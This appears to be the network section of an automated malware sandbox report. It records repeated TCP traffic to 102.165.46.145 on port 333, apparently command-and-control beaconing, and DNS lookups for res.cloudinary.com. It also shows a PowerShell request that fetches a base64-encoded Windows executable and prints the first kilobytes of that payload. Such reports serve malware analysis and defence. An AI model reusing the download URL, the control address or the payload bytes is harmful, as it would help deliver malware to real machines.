                                                                                          Dec 11, 2024 11:25:37.293503046 CET49739443192.168.2.4151.101.1.137
                                                                                          Dec 11, 2024 11:25:37.300532103 CET44349739151.101.1.137192.168.2.4
                                                                                          Dec 11, 2024 11:25:37.300586939 CET44349739151.101.1.137192.168.2.4
                                                                                          Dec 11, 2024 11:25:37.300638914 CET49739443192.168.2.4151.101.1.137
                                                                                          Dec 11, 2024 11:25:37.301014900 CET49739443192.168.2.4151.101.1.137
                                                                                          Dec 11, 2024 11:25:47.326095104 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:25:47.445451021 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:25:51.232980013 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:25:51.236216068 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:25:51.355591059 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:25:51.669548988 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:25:51.671127081 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:25:51.790555954 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:25:51.790668011 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:25:51.911063910 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:06.358095884 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:06.362121105 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:06.481398106 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:06.793450117 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:06.836297035 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:06.955934048 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:06.955981016 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:07.075886011 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:17.341478109 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:17.460887909 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:21.451910019 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:21.454511881 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:21.573944092 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:21.888442039 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:21.890117884 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:22.009644032 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:22.009779930 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:22.129210949 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:36.560504913 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:36.561980963 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:36.681349039 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:36.992794991 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:37.029977083 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:37.149930954 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:37.153471947 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:37.272907972 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:47.356218100 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:47.476450920 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:50.966752052 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:51.086081982 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:51.673141956 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:51.675931931 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:51.795303106 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:52.158584118 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:52.160046101 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:52.281950951 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:52.282005072 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:52.404331923 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:00.231888056 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:00.351212025 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:00.351303101 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:00.470707893 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:06.782187939 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:06.783524990 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:06.904613018 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:07.216712952 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:07.219585896 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:07.338936090 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:07.339102983 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:07.458384037 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:16.419352055 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:16.538744926 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:21.858023882 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:21.859977961 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:21.980254889 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:22.294751883 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:22.296391010 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:22.415735006 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:22.415882111 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:22.535227060 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:24.841118097 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:24.960437059 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:36.967088938 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:36.969122887 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:37.088521957 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:37.399974108 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:37.401290894 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:37.522075891 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:37.522553921 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:37.641886950 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:52.092341900 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:52.093977928 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:52.217875957 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:52.529544115 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:52.531292915 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:52.654155970 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:52.654222012 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:52.776010036 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:04.185051918 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:04.310997009 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:07.201703072 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:07.203226089 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:07.325504065 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:07.678388119 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:07.717473030 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:07.837148905 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:07.837270021 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:07.957387924 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:22.328274012 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:22.330218077 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:22.449661016 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:22.760802984 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:22.762044907 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:22.881401062 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:22.881623030 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:23.000952005 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:32.106992006 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:32.232434988 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:34.028762102 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:34.154808998 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:37.434170008 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:37.435858965 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:37.563231945 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:37.888564110 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:37.891529083 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:38.016525984 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:38.019783020 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:38.146681070 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:47.685523987 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:47.811211109 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:50.653806925 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:50.778048038 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:52.514342070 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:52.517499924 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:52.643161058 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:52.967658043 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:52.968924999 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:53.094192028 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:53.101525068 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:53.225230932 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:29:04.202632904 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:29:04.325191975 CET33349733102.165.46.145192.168.2.4

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 11, 2024 11:25:11.901866913 CET5482553192.168.2.41.1.1.1
                                                                                          Dec 11, 2024 11:25:12.039607048 CET53548251.1.1.1192.168.2.4
                                                                                          Dec 11, 2024 11:25:27.404480934 CET5458453192.168.2.41.1.1.1
                                                                                          Dec 11, 2024 11:25:27.701514959 CET53545841.1.1.1192.168.2.4

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Dec 11, 2024 11:25:11.901866913 CET192.168.2.41.1.1.10xedb1Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                          Dec 11, 2024 11:25:27.404480934 CET192.168.2.41.1.1.10x64Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Dec 11, 2024 11:25:12.039607048 CET1.1.1.1192.168.2.40xedb1No error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                          Dec 11, 2024 11:25:12.039607048 CET1.1.1.1192.168.2.40xedb1No error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                          Dec 11, 2024 11:25:12.039607048 CET1.1.1.1192.168.2.40xedb1No error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                          Dec 11, 2024 11:25:12.039607048 CET1.1.1.1192.168.2.40xedb1No error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                          Dec 11, 2024 11:25:12.039607048 CET1.1.1.1192.168.2.40xedb1No error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                          Dec 11, 2024 11:25:27.701514959 CET1.1.1.1192.168.2.40x64No error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                          Dec 11, 2024 11:25:27.701514959 CET1.1.1.1192.168.2.40x64No error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                          Dec 11, 2024 11:25:27.701514959 CET1.1.1.1192.168.2.40x64No error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                          Dec 11, 2024 11:25:27.701514959 CET1.1.1.1192.168.2.40x64No error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                          Dec 11, 2024 11:25:27.701514959 CET1.1.1.1192.168.2.40x64No error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • res.cloudinary.com

                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.449730151.101.193.1374437548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-11 10:25:13 UTC116OUTGET /dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt HTTP/1.1
                                                                                          Host: res.cloudinary.com
                                                                                          Connection: Keep-Alive
                                                                                          2024-12-11 10:25:13 UTC651INHTTP/1.1 200 OK
                                                                                          Connection: close
                                                                                          Content-Length: 22528
                                                                                          Content-Type: text/plain
                                                                                          Etag: "cb75e1ff3f0a9c976292f34e67a24826"
                                                                                          Last-Modified: Tue, 10 Dec 2024 21:06:18 GMT
                                                                                          Date: Wed, 11 Dec 2024 10:25:13 GMT
                                                                                          Vary: Accept-Encoding
                                                                                          Strict-Transport-Security: max-age=604800
                                                                                          Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                          Server-Timing: cld-fastly;dur=2;cpu=1;start=2024-12-11T10:25:13.542Z;desc=hit,rtt;dur=169
                                                                                          Server: Cloudinary
                                                                                          Timing-Allow-Origin: *
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Accept-Ranges: bytes
                                                                                          Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,Vary
                                                                                          x-request-id: 156949546e77fa312c2e390d2cd36212
                                                                                          2024-12-11 10:25:13 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 44 62 52 39 2b 30 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 67 41 4c 41 54 41 41 41 44 67 41 41 41 41 49 41 41 41 41 41 41 41 41 46 6c 59 41 41 41 41 67 41 41 41 41 59 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                          Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDADbR9+0AAAAAAAAAAOAAIgALATAAADgAAAAIAAAAAAAAFlYAAAAgAAAAYAAAAABAAAAgAAAAAgA
                                                                                          2024-12-11 10:25:13 UTC1378INData Raw: 41 41 41 41 70 79 74 51 41 41 63 48 34 45 41 41 41 45 4b 42 6f 41 41 41 5a 79 79 51 41 41 63 41 63 58 6d 69 67 68 41 41 41 4b 46 32 38 69 41 41 41 4b 46 50 34 44 45 77 59 52 42 6a 6d 35 41 41 41 41 41 41 41 43 66 67 45 41 41 41 52 2b 41 67 41 41 42 41 63 61 6d 67 63 62 6d 6e 34 44 41 41 41 45 4b 42 73 41 41 41 5a 79 7a 51 41 41 63 43 67 51 41 41 41 47 4b 42 38 41 41 41 6f 6f 47 67 41 41 42 6e 4c 52 41 41 42 77 66 67 51 41 41 41 51 6f 47 67 41 41 42 6e 49 4a 41 51 42 77 42 78 65 61 4b 43 45 41 41 41 6f 48 46 35 6f 55 4b 43 4d 41 41 41 70 76 4a 41 41 41 43 67 63 59 6d 69 67 6c 41 41 41 4b 42 78 6d 61 4b 43 59 41 41 41 6f 48 46 35 6f 58 4b 41 55 41 41 41 59 41 41 4e 34 2b 4a 67 41 64 6a 53 6b 41 41 41 45 6c 46 6e 49 50 41 51 42 77 6f 69 55 58 42 71 49 6c 47
                                                                                          Data Ascii: AAAApytQAAcH4EAAAEKBoAAAZyyQAAcAcXmighAAAKF28iAAAKFP4DEwYRBjm5AAAAAAACfgEAAAR+AgAABAcamgcbmn4DAAAEKBsAAAZyzQAAcCgQAAAGKB8AAAooGgAABnLRAABwfgQAAAQoGgAABnIJAQBwBxeaKCEAAAoHF5oUKCMAAApvJAAACgcYmiglAAAKBxmaKCYAAAoHF5oXKAUAAAYAAN4+JgAdjSkAAAElFnIPAQBwoiUXBqIlG
                                                                                          2024-12-11 10:25:13 UTC1378INData Raw: 41 41 41 4b 46 50 34 42 45 77 63 52 42 79 77 6f 41 41 4a 79 30 51 41 41 63 48 34 45 41 41 41 45 4b 42 6f 41 41 41 5a 79 79 51 41 41 63 41 34 4a 4b 43 45 41 41 41 6f 4f 43 51 34 47 4b 41 63 41 41 41 59 41 41 41 44 65 42 53 59 41 41 4e 34 41 44 67 6f 57 2f 67 45 54 43 42 45 49 4c 43 67 41 41 6e 4c 52 41 41 42 77 66 67 51 41 41 41 51 6f 47 67 41 41 42 6e 4c 4a 41 41 42 77 44 67 6b 6f 49 51 41 41 43 67 34 4a 44 67 59 6f 42 77 41 41 42 67 41 41 41 41 44 65 42 53 59 41 41 4e 34 41 4b 6b 45 30 41 41 41 41 41 41 41 41 79 77 41 41 41 46 73 41 41 41 41 6d 41 51 41 41 42 51 41 41 41 41 38 41 41 41 45 41 41 41 41 41 41 51 41 41 41 47 45 42 41 41 42 69 41 51 41 41 42 51 41 41 41 41 38 41 41 41 45 62 4d 41 63 41 54 67 41 41 41 41 51 41 41 42 45 41 41 42 71 4e 4d 41 41
                                                                                          Data Ascii: AAAKFP4BEwcRBywoAAJy0QAAcH4EAAAEKBoAAAZyyQAAcA4JKCEAAAoOCQ4GKAcAAAYAAADeBSYAAN4ADgoW/gETCBEILCgAAnLRAABwfgQAAAQoGgAABnLJAABwDgkoIQAACg4JDgYoBwAABgAAAADeBSYAAN4AKkE0AAAAAAAAywAAAFsAAAAmAQAABQAAAA8AAAEAAAAAAQAAAGEBAABiAQAABQAAAA8AAAEbMAcATgAAAAQAABEAABqNMAA
                                                                                          2024-12-11 10:25:13 UTC1378INData Raw: 41 41 41 51 42 54 56 41 41 46 44 77 41 41 41 52 73 77 41 67 42 75 41 41 41 41 43 51 41 41 45 51 41 41 41 48 49 56 41 67 42 77 63 30 41 41 41 41 6f 6f 51 51 41 41 43 6d 39 43 41 41 41 4b 43 69 73 6f 42 6d 39 44 41 41 41 4b 64 42 6f 41 41 41 45 4c 41 41 64 79 55 51 49 41 63 47 39 45 41 41 41 4b 4b 45 55 41 41 41 6f 4d 45 67 49 6f 52 67 41 41 43 67 33 65 4b 67 5a 76 52 77 41 41 43 69 33 51 33 67 73 47 4c 41 63 47 62 30 67 41 41 41 6f 41 33 41 44 65 43 69 59 41 63 74 38 42 41 48 41 4e 33 67 68 79 33 77 45 41 63 41 30 72 41 41 6b 71 41 41 41 42 48 41 41 41 41 67 41 59 41 44 52 4d 41 41 73 41 41 41 41 41 41 41 41 42 41 46 6c 61 41 41 6f 50 41 41 41 42 47 7a 41 44 41 4d 6f 41 41 41 41 4b 41 41 41 52 41 41 42 2b 53 51 41 41 43 67 6f 41 63 6d 73 43 41 48 42 7a 4d
                                                                                          Data Ascii: AAAQBTVAAFDwAAARswAgBuAAAACQAAEQAAAHIVAgBwc0AAAAooQQAACm9CAAAKCisoBm9DAAAKdBoAAAELAAdyUQIAcG9EAAAKKEUAAAoMEgIoRgAACg3eKgZvRwAACi3Q3gsGLAcGb0gAAAoA3ADeCiYAct8BAHAN3ghy3wEAcA0rAAkqAAABHAAAAgAYADRMAAsAAAAAAAABAFlaAAoPAAABGzADAMoAAAAKAAARAAB+SQAACgoAcmsCAHBzM
                                                                                          2024-12-11 10:25:13 UTC1378INData Raw: 49 44 39 43 44 77 42 76 58 77 41 41 43 67 41 6c 49 44 39 43 44 77 42 76 59 41 41 41 43 67 43 41 43 51 41 41 42 48 34 4a 41 41 41 45 66 67 45 41 41 41 52 2b 41 67 41 41 42 43 68 68 41 41 41 4b 62 32 49 41 41 41 6f 41 46 34 41 4b 41 41 41 45 4b 41 34 41 41 41 59 6f 49 41 41 41 42 67 41 55 2f 67 59 65 41 41 41 47 63 32 4d 41 41 41 6f 4b 42 68 51 67 4d 48 55 41 41 43 41 77 64 51 41 41 63 32 51 41 41 41 71 41 44 41 41 41 42 48 4e 6c 41 41 41 4b 67 41 73 41 41 41 51 41 33 68 59 6d 41 42 61 41 43 67 41 41 42 43 43 34 43 77 41 41 4b 42 45 41 41 41 6f 41 41 4e 34 41 41 48 34 4b 41 41 41 45 46 76 34 42 43 77 63 36 45 66 2f 2f 2f 7a 67 33 41 51 41 41 41 41 42 2b 43 51 41 41 42 42 55 57 62 32 59 41 41 41 6f 73 44 58 34 4a 41 41 41 45 62 32 63 41 41 41 6f 57 4d 51 39
                                                                                          Data Ascii: ID9CDwBvXwAACgAlID9CDwBvYAAACgCACQAABH4JAAAEfgEAAAR+AgAABChhAAAKb2IAAAoAF4AKAAAEKA4AAAYoIAAABgAU/gYeAAAGc2MAAAoKBhQgMHUAACAwdQAAc2QAAAqADAAABHNlAAAKgAsAAAQA3hYmABaACgAABCC4CwAAKBEAAAoAAN4AAH4KAAAEFv4BCwc6Ef///zg3AQAAAAB+CQAABBUWb2YAAAosDX4JAAAEb2cAAAoWMQ9
                                                                                          2024-12-11 10:25:13 UTC1378INData Raw: 45 41 63 33 45 41 41 41 6f 4b 63 32 55 41 41 41 6f 4c 63 32 55 41 41 41 6f 4d 41 69 67 59 41 41 41 47 41 78 55 58 4b 42 67 41 41 41 6f 4e 42 77 49 57 43 52 61 61 62 32 77 41 41 41 70 76 61 67 41 41 43 67 41 49 41 67 6b 57 6d 6d 39 73 41 41 41 4b 41 32 39 73 41 41 41 4b 57 41 4b 4f 61 51 6b 57 6d 6d 39 73 41 41 41 4b 41 32 39 73 41 41 41 4b 57 46 6c 76 61 67 41 41 43 67 41 47 42 32 39 72 41 41 41 4b 62 33 49 41 41 41 6f 41 42 67 68 76 61 77 41 41 43 6d 39 79 41 41 41 4b 41 41 64 76 56 67 41 41 43 67 41 49 62 31 59 41 41 41 6f 41 42 6d 39 7a 41 41 41 4b 45 77 51 72 41 42 45 45 4b 69 35 7a 49 77 41 41 42 6f 41 55 41 41 41 45 4b 69 49 43 4b 42 59 41 41 41 6f 41 4b 6a 59 41 66 67 59 41 41 41 52 76 64 41 41 41 43 67 41 71 49 67 49 6f 46 67 41 41 43 67 41 71 61
                                                                                          Data Ascii: EAc3EAAAoKc2UAAAoLc2UAAAoMAigYAAAGAxUXKBgAAAoNBwIWCRaab2wAAApvagAACgAIAgkWmm9sAAAKA29sAAAKWAKOaQkWmm9sAAAKA29sAAAKWFlvagAACgAGB29rAAAKb3IAAAoABghvawAACm9yAAAKAAdvVgAACgAIb1YAAAoABm9zAAAKEwQrABEEKi5zIwAABoAUAAAEKiICKBYAAAoAKjYAfgYAAARvdAAACgAqIgIoFgAACgAqa
                                                                                          2024-12-11 10:25:13 UTC1378INData Raw: 41 43 49 41 41 67 45 41 41 48 6f 44 41 41 42 74 41 42 59 41 4a 51 41 44 41 52 41 41 46 77 41 41 41 44 30 41 47 67 41 6c 41 42 4d 42 41 41 42 73 41 41 41 41 6a 51 41 62 41 43 63 41 45 77 45 41 41 47 38 42 41 41 43 4e 41 42 73 41 4a 77 41 54 41 51 41 41 30 41 45 41 41 49 30 41 47 77 41 6e 41 42 4d 42 41 41 44 73 41 51 41 41 6a 51 41 62 41 43 63 41 45 77 45 41 41 46 49 43 41 41 43 4e 41 42 73 41 4a 77 41 54 41 51 41 41 79 51 41 41 41 49 30 41 47 77 41 6e 41 42 59 41 58 67 31 68 41 52 59 41 53 51 31 68 41 52 59 41 50 51 52 68 41 52 59 41 7a 77 31 68 41 52 59 41 48 41 35 68 41 52 59 41 77 67 31 34 41 68 59 41 69 41 70 68 41 52 59 41 4e 77 68 38 41 68 45 41 42 41 32 41 41 68 59 41 4d 51 53 45 41 68 45 41 70 41 69 48 41 68 45 41 73 77 79 4c 41 6a 4d 42 4f 51 4f
                                                                                          Data Ascii: ACIAAgEAAHoDAABtABYAJQADARAAFwAAAD0AGgAlABMBAABsAAAAjQAbACcAEwEAAG8BAACNABsAJwATAQAA0AEAAI0AGwAnABMBAADsAQAAjQAbACcAEwEAAFICAACNABsAJwATAQAAyQAAAI0AGwAnABYAXg1hARYASQ1hARYAPQRhARYAzw1hARYAHA5hARYAwg14AhYAiAphARYANwh8AhEABA2AAhYAMQSEAhEApAiHAhEAswyLAjMBOQO
                                                                                          2024-12-11 10:25:13 UTC1378INData Raw: 45 41 6d 77 55 41 41 41 45 41 77 77 77 41 41 41 45 41 73 77 4d 41 41 41 45 41 39 41 30 41 41 41 49 41 69 41 6f 41 41 41 45 41 79 77 6b 41 41 41 49 41 30 77 4d 4a 41 4e 6f 4b 41 51 41 52 41 4e 6f 4b 42 67 41 5a 41 4e 6f 4b 43 67 41 70 41 4e 6f 4b 45 41 41 78 41 4e 6f 4b 45 41 41 35 41 4e 6f 4b 45 41 42 42 41 4e 6f 4b 45 41 42 4a 41 4e 6f 4b 45 41 42 52 41 4e 6f 4b 45 41 42 5a 41 4e 6f 4b 45 41 42 68 41 4e 6f 4b 46 51 42 70 41 4e 6f 4b 45 41 42 78 41 4e 6f 4b 45 41 43 42 41 4e 6f 4b 42 67 43 4a 41 4e 6f 4b 42 67 43 35 41 4e 6f 4b 42 67 41 68 41 64 6f 4a 48 77 43 68 41 4e 6f 4b 4a 41 41 70 41 65 77 4d 48 77 43 52 41 4e 6f 4b 4c 41 41 78 41 64 30 4d 4d 67 42 35 41 4e 6f 4b 42 67 43 70 41 4e 6f 4b 42 67 41 35 41 64 63 4d 53 41 42 4a 41 58 51 4f 55 77 43 70 41
